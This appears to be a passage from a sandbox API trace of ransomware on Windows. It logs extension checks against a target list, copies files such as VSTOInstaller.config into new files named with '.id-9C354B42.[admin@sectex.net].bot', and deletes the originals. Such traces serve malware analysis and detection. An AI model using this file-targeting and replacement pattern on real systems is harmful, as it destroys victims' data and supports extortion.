	[0048.856] lstrlenW (lpString=".xlsx") returned 5
	[0048.856] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.856] lstrlenW (lpString=".ppt") returned 4
	[0048.856] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.856] lstrlenW (lpString=".zip") returned 4
	[0048.856] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.856] lstrlenW (lpString=".rar") returned 4
	[0048.856] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.856] lstrlenW (lpString=".bz2") returned 4
	[0048.856] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.856] lstrlenW (lpString=".7z") returned 3
	[0048.856] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".dbf") returned 4
	[0048.857] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".1cd") returned 4
	[0048.857] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".jpg") returned 4
	[0048.857] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".doc") returned 4
	[0048.857] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString=".docx") returned 5
	[0048.857] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.857] lstrlenW (lpString=".pdf") returned 4
	[0048.857] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString=".xls") returned 4
	[0048.857] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString=".xlsx") returned 5
	[0048.857] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.857] lstrlenW (lpString=".ppt") returned 4
	[0048.857] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".zip") returned 4
	[0048.857] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString=".rar") returned 4
	[0048.857] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.857] lstrlenW (lpString=".bz2") returned 4
	[0048.857] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.857] lstrlenW (lpString=".7z") returned 3
	[0048.857] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.857] lstrlenW (lpString=".dbf") returned 4
	[0048.857] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.858] lstrlenW (lpString=".1cd") returned 4
	[0048.858] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.858] lstrlenW (lpString=".jpg") returned 4
	[0048.858] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.858] lstrcmpiW (lpString1=".config", lpString2=".bot") returned 1
	[0048.858] lstrlenW (lpString="VSTOInstaller.config") returned 20
	[0048.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0049.134] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=716) returned 1
	[0049.134] CloseHandle (hObject=0x1b0) returned 1
	[0049.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 0x20
	[0049.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0049.134] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.135] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0049.135] GetLastError () returned 0x0
	[0049.135] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x2cc, lpOverlapped=0x0) returned 1
	[0049.693] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2d0, lpOverlapped=0x0) returned 1
	[0049.694] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.694] WriteFile (in: hFile=0x200, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0049.694] SetEndOfFile (hFile=0x200) returned 1
	[0049.694] CloseHandle (hObject=0x200) returned 1
	[0049.694] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.694] SetEndOfFile (hFile=0x1b0) returned 1
	[0049.695] CloseHandle (hObject=0x1b0) returned 1
	[0049.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0049.695] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1
	[0049.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.695] lstrlenW (lpString=".doc") returned 4
	[0049.695] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".docx") returned 5
	[0049.696] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1
	[0049.696] lstrlenW (lpString=".pdf") returned 4
	[0049.696] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".xls") returned 4
	[0049.696] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".xlsx") returned 5
	[0049.696] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1
	[0049.696] lstrlenW (lpString=".ppt") returned 4
	[0049.696] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString=".zip") returned 4
	[0049.696] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".rar") returned 4
	[0049.696] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".bz2") returned 4
	[0049.696] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".7z") returned 3
	[0049.696] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString=".dbf") returned 4
	[0049.696] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString=".1cd") returned 4
	[0049.696] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString=".jpg") returned 4
	[0049.696] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.696] lstrlenW (lpString=".doc") returned 4
	[0049.696] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1
	[0049.696] lstrlenW (lpString=".docx") returned 5
	[0049.696] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1
	[0049.697] lstrlenW (lpString=".pdf") returned 4
	[0049.697] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString=".xls") returned 4
	[0049.697] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString=".xlsx") returned 5
	[0049.697] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1
	[0049.697] lstrlenW (lpString=".ppt") returned 4
	[0049.697] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.697] lstrlenW (lpString=".zip") returned 4
	[0049.697] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString=".rar") returned 4
	[0049.697] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString=".bz2") returned 4
	[0049.697] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString=".7z") returned 3
	[0049.697] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1
	[0049.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.697] lstrlenW (lpString=".dbf") returned 4
	[0049.697] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.697] lstrlenW (lpString=".1cd") returned 4
	[0049.697] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1
	[0049.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77
	[0049.697] lstrlenW (lpString=".jpg") returned 4
	[0049.697] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1
	[0049.697] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0049.697] lstrlenW (lpString="BabyBoyMainBackground_PAL.wmv") returned 29
	[0049.697] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.020] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=325322) returned 1
	[0050.020] CloseHandle (hObject=0x184) returned 1
	[0050.020] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv")) returned 0x20
	[0050.020] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.020] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.020] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.020] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.020] lstrlenW (lpString=".doc") returned 4
	[0050.021] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString=".docx") returned 5
	[0050.021] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0050.021] lstrlenW (lpString=".pdf") returned 4
	[0050.021] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString=".xls") returned 4
	[0050.021] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.021] lstrlenW (lpString=".xlsx") returned 5
	[0050.021] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0050.021] lstrlenW (lpString=".ppt") returned 4
	[0050.021] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString=".zip") returned 4
	[0050.021] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.021] lstrlenW (lpString=".rar") returned 4
	[0050.021] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString=".bz2") returned 4
	[0050.021] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString=".7z") returned 3
	[0050.021] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString=".dbf") returned 4
	[0050.021] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString=".1cd") returned 4
	[0050.021] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString=".jpg") returned 4
	[0050.021] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.021] lstrlenW (lpString=".doc") returned 4
	[0050.022] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString=".docx") returned 5
	[0050.022] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0050.022] lstrlenW (lpString=".pdf") returned 4
	[0050.022] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString=".xls") returned 4
	[0050.022] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.022] lstrlenW (lpString=".xlsx") returned 5
	[0050.022] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0050.022] lstrlenW (lpString=".ppt") returned 4
	[0050.022] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.022] lstrlenW (lpString=".zip") returned 4
	[0050.022] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.022] lstrlenW (lpString=".rar") returned 4
	[0050.022] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString=".bz2") returned 4
	[0050.022] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString=".7z") returned 3
	[0050.022] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.022] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.022] lstrlenW (lpString=".dbf") returned 4
	[0050.022] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.022] lstrlenW (lpString=".1cd") returned 4
	[0050.022] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.022] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81
	[0050.022] lstrlenW (lpString=".jpg") returned 4
	[0050.022] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.022] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0050.022] lstrlenW (lpString="BabyBoyMainToNotesBackground.wmv") returned 32
	[0050.023] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.023] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=141214) returned 1
	[0050.023] CloseHandle (hObject=0x184) returned 1
	[0050.023] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv")) returned 0x20
	[0050.023] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.023] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.023] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.023] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.023] lstrlenW (lpString=".doc") returned 4
	[0050.023] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.023] lstrlenW (lpString=".docx") returned 5
	[0050.023] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.023] lstrlenW (lpString=".pdf") returned 4
	[0050.023] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.023] lstrlenW (lpString=".xls") returned 4
	[0050.023] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.023] lstrlenW (lpString=".xlsx") returned 5
	[0050.023] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.023] lstrlenW (lpString=".ppt") returned 4
	[0050.024] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString=".zip") returned 4
	[0050.024] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.024] lstrlenW (lpString=".rar") returned 4
	[0050.024] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString=".bz2") returned 4
	[0050.024] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString=".7z") returned 3
	[0050.024] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString=".dbf") returned 4
	[0050.024] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString=".1cd") returned 4
	[0050.024] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString=".jpg") returned 4
	[0050.024] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.024] lstrlenW (lpString=".doc") returned 4
	[0050.024] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString=".docx") returned 5
	[0050.024] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.024] lstrlenW (lpString=".pdf") returned 4
	[0050.024] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString=".xls") returned 4
	[0050.024] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.024] lstrlenW (lpString=".xlsx") returned 5
	[0050.024] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.024] lstrlenW (lpString=".ppt") returned 4
	[0050.024] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.025] lstrlenW (lpString=".zip") returned 4
	[0050.025] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.025] lstrlenW (lpString=".rar") returned 4
	[0050.025] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.025] lstrlenW (lpString=".bz2") returned 4
	[0050.025] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.025] lstrlenW (lpString=".7z") returned 3
	[0050.025] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.025] lstrlenW (lpString=".dbf") returned 4
	[0050.025] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.025] lstrlenW (lpString=".1cd") returned 4
	[0050.025] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 84
	[0050.025] lstrlenW (lpString=".jpg") returned 4
	[0050.025] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.025] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0050.025] lstrlenW (lpString="BabyBoyMainToNotesBackground_PAL.wmv") returned 36
